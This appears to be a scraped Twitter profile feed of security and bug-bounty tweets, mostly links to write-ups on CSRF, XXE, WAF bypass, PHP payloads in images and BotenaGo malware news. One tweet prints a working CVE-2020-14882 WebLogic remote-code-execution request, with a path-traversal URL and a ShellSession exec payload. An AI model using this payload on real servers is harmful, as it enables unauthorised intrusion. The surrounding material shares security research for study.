Joined January 2010
- Tweets 27,642
- Following 120
- Followers 392
- Likes 184
290 Photos and videos
tiara retweeted
10 Oct 2022
Can you spot the vulnerability? 🔎
Show us how you'd create an admin account in the comments 👇
The best explanation gets a 25€ SWAG voucher! 👕
51
175
1,035
11 Oct 2022
Persistent PHP payloads in PNGs: How to inject PHP code in an image – and keep it there !
#infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding #opensource #Linux #windows #DFIR #macOS #platform
synacktiv.com/publications/p…
1
2
12 Sep 2022
tiara retweeted
21 Aug 2022
Tahun 2020 kemarin kita berhasil menekan @IndiHome untuk mematikan tracker milik mereka yang selama ini digunakan untuk mencuri browsing history milik pelanggan.
Sekarang 26 juta browsing history yang dicuri itu bocor dan dibagikan gratis. Ternyata berikut dengan nama dan NIK 🙂
1,456
15,506
32,960
Hunting CSRF: An attacker’s perspective:✅
👇 💣
#bugbountytips #infosec
11
80
206
tiara retweeted
14 Jan 2022
[4/n]
2. Convert the content-type to XML using the "Content-Type Converter" Burp Extension.
3. Process the Request and if the request is processed successfully, it means that the XML parsing is supported.
4. Now, attempt to exploit XXE
Interesting Read: netspi.com/blog/technical/we…
1
4
20
26 Nov 2021
depends from person to person as something difficult for me can be easy for someone else and vice-versa
2
tiara retweeted
20 Nov 2021
Just published a write-up on Account Takeover due to OAuth Misconfiguration CSRF XSS and Weak CSP.
blog.dixitaditya.com/2021/11…
#Pentesting #hacking #cybersecurity #infosec #bugbounty #bugbountytips
3
148
319
Query the gitbla version number through the css file name and build a database index
Example:gitlab/gitlab-ce:13.9.5-ce.0
application-d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb.css
fofa.so/result?qbase64=Ym9ke…
censys.io/blog/cve-2021-2220…
1
4
14
#CVE-2020–14882 Weblogic Unauthorized bypass RCE
http://x.x.x.x:7001/console/images/../console.portal
POST:
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2….ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');")
testbnull.medium.com/weblogi…
8
462
962
tiara retweeted
27 Oct 2021
Pretty interesting writeup on bypassing ModSecurity WAF for SQLi.
🌟"When MySQL sees 1.e(abc), it will ignore the 1.e( portion because the following characters do not form a valid numeric value."🌟
blog.h3xstream.com/2021/10/b…
#bugbountytips #bugbounty #infosec #cybersecurity
3
131
287
17 Nov 2021
ChopChop is a CLI to help developers scanning endpoints and identifying exposition of sensitive services/files/folders.
github.com/michelin/ChopChop
17 Nov 2021
Hi community!
Today from "The Bug Bounty Hunter", we would like to talk about netlas.io it is a new search engine for discover, research and monitor any asset. It is so useful for your #bugbounty recon automation.
medium.com/@thebugbountyhunt…
2
3
15 Nov 2021
I've earned the Pentesting Principles Badge on TryHackMe for Completing the 'Introduction to Pentesting' module tryhackme.com/Enoleriand/bad… #tryhackme via @tryhackme
1
1
12
14 Nov 2021
Squid Game - I have just completed this room! Check it out: tryhackme.com/room/squidgame… #tryhackme #security #blue team #maldoc #squidgameroom via @tryhackme
1
1
16
14 Nov 2021
Millions of Routers, IoT Devices at Risk from New Open-Source Malware.
BotenaGo, written in Google’s Golang programming language, can exploit more than 30 different vulnerabilities.
2
3
14 Nov 2021
Newly surfaced malware that is difficult to detect and written in Google’s open-source programming language has the potential to exploit millions of routers and IoT devices, researchers have found.
1
2
14 Nov 2021
Discovered by researchers at AT&T AlienLabs, BotenaGo can exploit more than 30 different vulnerabilities to attack a target, Ofer Caspi, a security researcher at Alien Labs, wrote in a blog post published Thursday.
threatpost.com/routers-iot-o…
3
1